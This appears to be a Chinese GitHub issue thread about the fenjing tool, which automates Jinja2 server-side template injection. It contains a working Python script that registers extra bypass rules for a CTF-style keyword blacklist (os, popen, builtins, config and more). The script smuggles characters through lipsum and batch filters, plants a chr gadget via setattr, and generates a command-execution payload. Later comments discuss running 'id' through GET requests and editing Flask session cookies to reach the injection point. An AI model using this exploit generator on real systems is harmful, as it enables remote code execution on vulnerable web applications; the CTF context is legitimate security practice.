这个waf在本地搭建后用fenjing测试没绕成功 #4
这个主要是百分号字符和数字100没法绕过,手动将规则加入生成器后就可以了,代码如下:
from fenjing import const
from fenjing.full_payload_gen import FullPayloadGen
import logging
logging.basicConfig(level=logging.INFO)
# Substrings the challenge's filter rejects; waf() tests each one against a
# candidate payload. Order is kept as in the original rule list. Note that
# '"' appears twice (index 2 and 33) — harmless for a membership check.
blacklist = [
    "_", "'", '"', ".", "system", "os", "eval", "exec", "popen", "subprocess",
    "posix", "builtins", "namespace", "open", "read", "\\", "self", "mro", "base",
    "global", "init", "/", "00", "chr", "value", "get", "url", "pop", "import",
    "include", "request", "{{", "}}", '"', "config", "=",
]
def waf(s: str) -> bool:
    """Return True when *s* contains none of the substrings in ``blacklist``.

    This mirrors the challenge's filter so FullPayloadGen can probe it
    locally; the check is a plain, case-sensitive substring test.
    """
    for banned in blacklist:
        if banned in s:
            return False
    return True
def get_char(target):
    """Return the expression template that evaluates to the single character *target*.

    Each key below is an expression with a placeholder ``X``; the mapped dict
    records which character the expression yields at each ``batch`` index.
    The first table containing *target* (in insertion order) is used.

    Raises:
        Exception: if *target* occurs in none of the tables (message-less,
        exactly as the original).
    """
    tables = {
        "(x|pprint|list|batch(X)|first|last)": {
            0: '!', 1: 'U', 2: 'n', 3: 'd', 4: 'e', 5: 'f', 6: 'i', 7: 'n', 8: 'e',
        },
        "(lipsum|string|list|batch(X)|first|last)": {
            0: '!', 1: '&', 2: 'f', 3: 'u', 4: 'n', 5: 'c', 6: 't', 7: 'i', 8: 'o',
            9: 'n', 10: ' ', 11: 'g', 12: 'e', 13: 'n', 14: 'e', 15: 'r', 16: 'a',
            17: 't', 18: 'e', 19: '_', 20: 'l', 21: 'o', 22: 'r', 23: 'e', 24: 'm',
            25: '_', 26: 'i', 27: 'p', 28: 's', 29: 'u', 30: 'm', 31: ' ', 32: 'a',
            33: 't', 34: ' ',
        },
        "(()|batch(1)|string|list|batch(X)|first|last)": {
            0: '!', 1: '&', 2: 'g', 3: 'e', 4: 'n', 5: 'e', 6: 'r', 7: 'a', 8: 't',
            9: 'o', 10: 'r', 11: ' ', 12: 'o', 13: 'b', 14: 'j', 15: 'e', 16: 'c',
            17: 't', 18: ' ', 19: 'd', 20: 'o', 21: '_', 22: 'b', 23: 'a', 24: 't',
            25: 'c', 26: 'h', 27: ' ', 28: 'a', 29: 't', 30: ' ',
        },
    }
    for template, chars in tables.items():
        # First index whose character matches wins, like the original loop.
        index = next((i for i, c in chars.items() if c == target), None)
        if index is not None:
            return template.replace("X", str(index))
    raise Exception()
def main() -> None:
    """
    A payload produced by FullPayloadGen consists of two parts.
    The trailing part is the payload the user actually asked for, normally wrapped in {{}}.
    The leading part, context_payload below, only prepares context for the trailing part, normally of the form {%set xxx=yyy}.
    The variables it prepares are stored in the context dict: the key is the expression used while generating the payload, the value is what that expression evaluates to.

    Two extra rules are registered by hand here because the automatic analysis
    of waf() does not cover them (see the issue text): the '%' character and
    the number 100 (whose decimal form contains the banned '00').
    """
    full_payload_gen = FullPayloadGen(waf)
    # Let FullPayloadGen analyse the waf function first
    full_payload_gen.do_prepare()
    print(f"{full_payload_gen.context=}", )
    print(f"{full_payload_gen.context_payload=}", )
    # Each uppercase placeholder is replaced by the per-character expressions
    # returned by get_char(), joined with '+'.
    chr_payload = (
        "lipsum|attr(GLOBAL)|attr(GETITEM)(BUILTINS)|attr(GETITEM)(CHR)"
        .replace("GLOBAL", "+".join(get_char(c) for c in "__globals__"))
        .replace("GETITEM", "+".join(get_char(c) for c in "__getitem__"))
        .replace("BUILTINS", "+".join(get_char(c) for c in "__builtins__"))
        .replace("CHR", "+".join(get_char(c) for c in "chr"))
    )
    chr_in_lipsum = (
        "{%if(lipsum|attr(SETATTR)(()|string, CHR_PAYLOAD))%}{%endif%}"
        .replace("SETATTR", "+".join(get_char(c) for c in "__setattr__"))
        .replace("CHR_PAYLOAD", chr_payload))
    # Now register the extra rules with FullPayloadGen. Each tuple is:
    # (expression used while generating, the value of that expression,
    #  payload that has to be prepended so the expression works).
    # 37 is ord('%'); hex(100) == '0x64' avoids the banned '00' substring.
    for literal, value, payload in [
        ("(lipsum|attr(()|string))(37)", "%", chr_in_lipsum),
        (hex(100), 100, "")
    ]:
        full_payload_gen.context[literal] = value
        full_payload_gen.context_payload += payload
    payload, _ = full_payload_gen.generate(const.OS_POPEN_READ, "echo 11111111111")
    print(payload)
if __name__ == "__main__":
    main()
我还在将这个规则加入到生成器中,可以参考上方的脚本加入规则并生成payload |
生成的payload非常长,如果有更好的payload也可以告诉我 |
找到一个更加简单的方法,已经加进去了,使用 |
可以加一个手动设置cookie的参数吗,有一道题需要手动修改flask-session,即cookie值后,才能进入到SSTI入口。 |
可以考虑一下 |
而且大佬,因为是GET请求,尝试了一下命令执行id命令,payload有这么长: |
测试成功了,原来是少了url编码,谢谢! |
提供一个更短一些的官方payload:
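# Filter list as pasted in the later comment. The pasted version had a lone
# '\' entry, which escapes the closing quote and leaves the literal
# unterminated (SyntaxError); it is restored to '\\', matching the list in
# the script above.
blacklist = [
    '_', "'", '"', '.', 'system', 'os', 'eval', 'exec', 'popen', 'subprocess',
    'posix', 'builtins', 'namespace', 'open', 'read', '\\', 'self', 'mro', 'base',
    'global', 'init', '/', '00', 'chr', 'value', 'get', "url", 'pop', 'import',
    'include', 'request', '{{', '}}', '"', 'config', '=',
]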